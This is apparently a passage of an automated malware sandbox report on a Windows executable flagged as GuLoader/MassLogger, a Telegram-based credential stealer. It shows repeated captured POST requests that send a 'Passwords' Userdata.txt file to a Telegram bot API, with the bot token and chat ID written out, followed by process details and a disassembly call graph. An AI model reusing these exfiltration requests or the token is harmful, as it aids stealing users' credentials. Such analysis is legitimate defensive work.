                                                                                                          2025-01-11 02:06:50 UTC270OUTPOST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd3759920c3fb5
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-11 02:06:50 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 37 35 39 39 32 30 63 33 66 62 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd3759920c3fb5Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-11 02:06:50 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Sat, 11 Jan 2025 02:06:50 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 58
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-11 02:06:50 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          30192.168.2.1049770149.154.167.2204438156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 02:06:52 UTC294OUTPOST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd37c46c893414
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-11 02:06:52 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 37 63 34 36 63 38 39 33 34 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd37c46c893414Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-11 02:06:52 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Sat, 11 Jan 2025 02:06:52 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 58
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-11 02:06:52 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          31192.168.2.1049772149.154.167.2204438156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 02:06:53 UTC270OUTPOST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd3847c2e14721
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-11 02:06:53 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 38 34 37 63 32 65 31 34 37 32 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd3847c2e14721Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-11 02:06:54 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Sat, 11 Jan 2025 02:06:53 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 58
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-11 02:06:54 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          32192.168.2.1049774149.154.167.2204438156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 02:06:55 UTC294OUTPOST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd38c1b36f23ea
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-11 02:06:55 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 38 63 31 62 33 36 66 32 33 65 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd38c1b36f23eaContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-11 02:06:55 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Sat, 11 Jan 2025 02:06:55 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 58
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-11 02:06:55 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          33192.168.2.1049776149.154.167.2204438156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 02:06:57 UTC270OUTPOST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd393cc0358b5d
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-11 02:06:57 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 39 33 63 63 30 33 35 38 62 35 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd393cc0358b5dContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-11 02:06:57 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Sat, 11 Jan 2025 02:06:57 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 58
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-11 02:06:57 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          34192.168.2.1049778149.154.167.2204438156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 02:06:59 UTC270OUTPOST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd39b997d3f58b
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-11 02:06:59 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 39 62 39 39 37 64 33 66 35 38 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd39b997d3f58bContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-11 02:06:59 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Sat, 11 Jan 2025 02:06:59 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 58
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-11 02:06:59 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          35192.168.2.1049780149.154.167.2204438156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 02:07:01 UTC270OUTPOST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd3a0842782977
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-11 02:07:01 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 61 30 38 34 32 37 38 32 39 37 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd3a0842782977Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-11 02:07:01 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Sat, 11 Jan 2025 02:07:01 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 58
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-11 02:07:01 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          36192.168.2.1049782149.154.167.2204438156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 02:07:02 UTC270OUTPOST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd3a8a4b2b1383
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-11 02:07:02 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 61 38 61 34 62 32 62 31 33 38 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd3a8a4b2b1383Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-11 02:07:03 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Sat, 11 Jan 2025 02:07:03 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 58
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-11 02:07:03 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                          Statistics

                                                                                                          CPU Usage

                                                                                                          Click to jump to process

                                                                                                          Memory Usage

                                                                                                          Click to jump to process

                                                                                                          High Level Behavior Distribution

                                                                                                          Click to dive into process behavior distribution

                                                                                                          Behavior

                                                                                                          Click to jump to process

                                                                                                          System Behavior

                                                                                                          General

                                                                                                          Target ID:0
                                                                                                          Start time:21:04:55
                                                                                                          Start date:10/01/2025
                                                                                                          Path:C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\Desktop\4NG0guPiKA.exe"
                                                                                                          Imagebase:0x400000
                                                                                                          File size:778'465 bytes
                                                                                                          MD5 hash:8F02B3E31021D64ED25A599E58BC8F2F
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1571921135.000000000347E000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:3
                                                                                                          Start time:21:05:16
                                                                                                          Start date:10/01/2025
                                                                                                          Path:C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\Desktop\4NG0guPiKA.exe"
                                                                                                          Imagebase:0x400000
                                                                                                          File size:778'465 bytes
                                                                                                          MD5 hash:8F02B3E31021D64ED25A599E58BC8F2F
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.2646464794.000000003326B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2646464794.000000003326B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.2646464794.000000003326B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:low
                                                                                                          Has exited:false

                                                                                                          Disassembly

                                                                                                          Reset < >

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:20.5%
                                                                                                            Dynamic/Decrypted Code Coverage:15.8%
                                                                                                            Signature Coverage:19.6%
                                                                                                            Total number of Nodes:1451
                                                                                                            Total number of Limit Nodes:43
                                                                                                            execution_graph 4886 10001000 4889 1000101b 4886->4889 4896 1000152e 4889->4896 4891 10001020 4892 10001024 4891->4892 4893 10001027 GlobalAlloc 4891->4893 4894 10001555 3 API calls 4892->4894 4893->4892 4895 10001019 4894->4895 4897 10001243 3 API calls 4896->4897 4898 10001534 4897->4898 4899 1000153a 4898->4899 4900 10001546 GlobalFree 4898->4900 4899->4891 4900->4891 4901 401d41 GetDC GetDeviceCaps 4902 402b1d 18 API calls 4901->4902 4903 401d5f MulDiv ReleaseDC 4902->4903 4904 402b1d 18 API calls 4903->4904 4905 401d7e 4904->4905 4906 405f0c 18 API calls 4905->4906 4907 401db7 CreateFontIndirectW 4906->4907 4908 4024e8 4907->4908 4909 4029c1 InvalidateRect 4910 4029c7 4909->4910 4911 401a42 4912 402b1d 18 API calls 4911->4912 4913 401a48 4912->4913 4914 402b1d 18 API calls 4913->4914 4915 4019f0 4914->4915 4916 404243 lstrcpynW lstrlenW 4917 402746 4918 402741 4917->4918 4918->4917 4919 402756 FindNextFileW 4918->4919 4920 4027a8 4919->4920 4922 402761 4919->4922 4920->4922 4923 405eea lstrcpynW 4920->4923 4923->4922 4924 401cc6 4925 402b1d 18 API calls 4924->4925 4926 401cd9 SetWindowLongW 4925->4926 4927 4029c7 4926->4927 4042 401dc7 4050 402b1d 4042->4050 4044 401dcd 4045 402b1d 18 API calls 4044->4045 4046 401dd6 4045->4046 4047 401de8 EnableWindow 4046->4047 4048 401ddd ShowWindow 4046->4048 4049 4029c7 4047->4049 4048->4049 4051 405f0c 18 API calls 4050->4051 4052 402b31 4051->4052 4052->4044 4935 4045ca 4936 4045f6 4935->4936 4937 404607 4935->4937 4996 4056aa GetDlgItemTextW 4936->4996 4939 404613 GetDlgItem 4937->4939 4942 404672 4937->4942 4941 404627 4939->4941 4940 404601 4944 40617e 5 API calls 4940->4944 4945 40463b SetWindowTextW 4941->4945 4948 4059e0 4 API calls 4941->4948 4943 404756 4942->4943 4950 405f0c 18 API calls 4942->4950 4994 4048f7 4942->4994 4943->4994 4998 4056aa GetDlgItemTextW 4943->4998 4944->4937 4949 40412f 19 API calls 4945->4949 4947 404196 8 API calls 4952 40490b 4947->4952 4953 404631 4948->4953 4954 404657 4949->4954 4955 4046e6 SHBrowseForFolderW 4950->4955 4951 404786 4956 405a3d 18 API calls 4951->4956 4953->4945 4962 405935 3 API calls 4953->4962 4957 40412f 19 API calls 4954->4957 4955->4943 4958 4046fe CoTaskMemFree 4955->4958 4959 40478c 4956->4959 4960 404665 4957->4960 4961 405935 3 API calls 4958->4961 4999 405eea lstrcpynW 4959->4999 4997 404164 SendMessageW 4960->4997 4964 40470b 4961->4964 4962->4945 4967 404742 SetDlgItemTextW 4964->4967 4971 405f0c 18 API calls 4964->4971 4966 40466b 4969 406254 3 API calls 4966->4969 4967->4943 4968 4047a3 4970 406254 3 API calls 4968->4970 4969->4942 4978 4047ab 4970->4978 4972 40472a lstrcmpiW 4971->4972 4972->4967 4975 40473b lstrcatW 4972->4975 4973 4047ea 5000 405eea lstrcpynW 4973->5000 4975->4967 4976 4047f1 4977 4059e0 4 API calls 4976->4977 4979 4047f7 GetDiskFreeSpaceW 4977->4979 4978->4973 4982 405981 2 API calls 